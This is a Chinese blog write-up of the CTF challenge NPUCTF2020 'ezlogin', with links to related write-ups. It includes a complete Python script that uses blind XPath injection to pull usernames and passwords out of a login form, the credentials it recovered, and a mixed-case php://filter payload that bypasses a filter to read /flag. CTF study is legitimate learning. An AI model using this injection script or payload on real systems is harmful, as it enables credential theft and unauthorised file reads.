[NPUCTF2020]ezlogin

最新推荐文章于 2024-05-31 23:11:29 发布
最新推荐文章于 2024-05-31 23:11:29 发布
阅读量509 收藏
点赞数
分类专栏: xml # ctf做题记录 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/116614074
版权

XPATH注入学习
一道xpath注入题,又是陌生的知识,学习一下。
上面文章写得很通俗易懂了,就不多说了 直接上脚本

import time
import requests
import re
import string
import logging



# LOG_FORMAT = "%(lineno)d - %(asctime)s - %(levelname)s - %(message)s"
# logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT)
target='http://a6b8c73c-96c1-4e55-9f69-98d870a6fc1e.node3.buuoj.cn/login.php'
s = requests.session()
head ={
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",
    "Content-Type": "application/xml"
}
find =re.compile('<input type="hidden" id="token" value="(.*?)" />')
str1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_!@#$%^&*()'
#根节点
# payload="<username>'or substring(name(/*[1]),{},1)='{}' or '=</username><password>123</password><token>{}</token>"
#子节点
# payload="<username>'or substring(name(/root/*[1]), {}, 1)='{}'  or '=</username><password>3123</password><token>{}</token>"
#accounts节点
# payload="<username>'or substring(name(/root/accounts/*[1]), {}, 1)='{}'  or '=</username><password>3123</password><token>{}</token>"
#user节点
payload="<username>'or substring(name(/root/accounts/user/*[2]), {}, 1)='{}'  or '=</username><password>3123</password><token>{}</token>"
#跑用户名和密码
payload_username ="<username>'or substring(/root/accounts/user[2]/username/text(), {}, 1)='{}'  or '=</username><password>3123</password><token>{}</token>"
payload_password ="<username>'or substring(/root/accounts/user[2]/password/text(), {}, 1)='{}'  or '=</username><password>3123</password><token>{}</token>"
def exp():
    res = ''
    for i in range(1,100):
        flag=0
        for str in str1:
            r = s.post(url=target)
            token = find.findall(r.text)
            # print(token[0])
            r = s.post(url=target, headers=head, data=payload_username.format(i, str, token[0]))
            # print(payload.format(i, str, token[0]))
            # print(r.text)
            if '非法操作!' in r.text:
                flag=1
                res = res + str
                print("now :{}".format(res))
                break
        if(flag==0):
            break
    print("最终结果: {}".format(res))




if __name__ == "__main__":
    exp()

最后跑出来用户名adm1n,密码cf7414b5bdb2e65ee43083f4ddbc4d9fmd5解密后的密码gtfly123
登录成功后得到一串base64加密的字符
在这里插入图片描述
提示flag在/flag
看url
在这里插入图片描述
应该是要读文件。
无法直接读,过滤了关键字,最后伪协议大小写绕过
phP://filter/convert.bAse64-encode/resource=/flag
在这里插入图片描述

fmyyy1
关注
专栏目录
BUUCTF [NPUCTF2020]芜湖
weixin_53349587的博客
01-09 3060
这道题是一个base64隐写,我们要先提取出所有的base加密值,然后用base隐写提取的函数,把flag提取出来,就得到了flag。 1.提取base值 本来想着用ida动调一下,应该可以提出来,结果值在堆上面,ida动调只能看到一半的base值,一点用也没有,没办法,就用pwn的pwndbg查看堆: 接下来就一直单步s运行下去,一个一个把base值提取出来,得到最终的base值: "55y85YmN6YeN5aSN55qE6aOO5pmvLG==", "5riQ5riQ5qih57OK5L
[NPUCTF2020]共 模 攻 击
2er0!=O的博客
08-01 996
[NPUCTF2020]共 模 攻 击 附件: hint.py: from gmpy2 import * from Crypto.Util.number import * from secret import hint m = bytes_to_long(hint) p = getPrime(256) c = pow(m, 256, p) print(p) p, q = getPrime(256), getPrime(256) n = p * q e1, e2 = getPrime(32), getP
EZ-Login:Flask最简单的登录系统
03-08
EZ登录 要求 您只需要安装Python和Flask。 要获得Flask,您可以通过pip install Flask或进行pip3 install Flask 。 设置 设置登录系统非常简单。 您实际上无法进行git clone因为您只需要克隆一个文件夹即可。 复制并粘贴并将其放入名为Login.py的文件中。 接下来创建一个名为Users.json全新JSON文件。 确保它与Login.py在同一目录中,并确保其中没有数据。 空白表示: {} 。
BUUCTF--[NPUCTF2020]ezlogin
qq_46263951的博客
07-28 575
进入页面后是一个登录页面 几番尝试后没啥发现,尝试抓包 判断是一个Xpath数据,这里需要使用xpath注入 先学习一下Xpath注入 这里使用大佬的脚本进行探测 import requests import re import time session = requests.session() url = "http://391bfefa-8949-4535-8129-07c86723c6b9.node4.buuoj.cn" chars = "ABCDEFGHIJKLMNOPQRST..
[NPUCTF2020]Baby Obfuscation.exe.i64
06-02
Baby Obfuscation分析过程
[NPUCTF2020]认清形势,建立信心-WP
luoluopeach
09-10 663
题目: from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e,
[NPUCTF2020]Classical Cipher
2er0!=O的博客
07-23 1173
[NPUCTF2020]Classical Cipher 附件: key.txt: 解密后的flag请用flag{}包裹 压缩包密码:gsv_pvb_rh_zgyzhs 对应明文: ***_key_**_****** 词频分析 得到压缩包密码: 第一个尝试无果,发现第二个才是正确的密码: the_key_is_atbash 猪圈加动物???? 解密得到flag: classicalcode 根据题目要求套上flag提交即可! ...
[NPUCTF2020]ezlogin xPATH注入
qq_54929891的博客
07-01 454
xPATH
[NPUCTF2020]ezlogin (xpath盲注)
记录学习,一起进步
03-26 896
[NPUCTF2020]ezlogin (xpath盲注)
[NPUCTF2020]ezlogin-XPATH注入学习
cjdgg的博客
05-13 661
[NPUCTF2020]ezlogin-XPATH注入学习 这题进入后就是一个简单的登录页面,拿御剑没有扫出别的东西,简单的sql注入试了一下也没有任何回显,爆破的话他这里有一个token一直在刷新,所以会有点麻烦,应该也不会拿爆破来考别人 后来看了别人的WP才知道是XPATH注入,以前没遇到过,也不是很了解,于是去找了篇相关文章顺带学习一下 这些是XPATH的一些基础语法和介绍 从这里可以看到它和sql注入还是很相像的,只不过XPATH注入好像没有注释符把后面的都注释掉,所以需要我们去构造闭合后面的
NUAA CTF校赛Web ezlogin
WeiDuoe的博客
04-14 548
看到提示说要让传入的username和password的MD5值强相等并且username和password弱相等,于是想到如果传入的不是字符串而是数组,不但md5()函数不会报错,结果还会返回null,在强比较里面null=null为true,构造payload,username[]=1&password[]=2。file=setu于猜测是最后加了.php,于是去掉.php的后缀后最终读到了base64加密后的源码。,这样子表示可能是文件包含漏洞的考点,于是尝试读取一下源码,尝试。Ctrl+u查看源码。
npuctf
zipry的博客
06-26 724
NPUCTF 复现 CTF WP 计算机网络 CTF 学习总结 密码学 操作系统 NPUCTF 复现 2个月前 / 0评 / 1赞 赏 码比赛的时候运维太差了,所以就想着赛后复现一下。Table of Contents[NPUCTF2020]ReadlezPHP[NPUCTF2020]ezlogin[NPUCTF2020]验证????[NPUCTF
青少年CTF练习平台 EzLogin exp
最新发布
2301_80395418的博客
05-31 342
【代码】青少年CTF练习平台 EzLogin exp。
xpath注入[NPUCTF2020]ezlogin
qq_62046696的博客
02-09 699
false or true or true and false ,如果是两个 false or true and false 不就是false了吗。PHP://filter/string.toupper/resource=/flag 转换为大写都可以绕过。不管输入什么,很容易发现登陆就超时了,说明这里token是不断刷新的。这样构造也是一样的目的都是为了闭合后面的',为啥有两个or呢。有的时候会因为网络报错,加一个time.sleep就可以了。这条命令是判断根目录有几个结点,
从以下代码中找到被藏起来的e,提示:在代码注释中。from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ''' 169169912654178 128509160179202 518818742414340 358553002064450
07-16
m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ``` 在修改后的代码中,我们将 `e` 的值设置为 65537。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值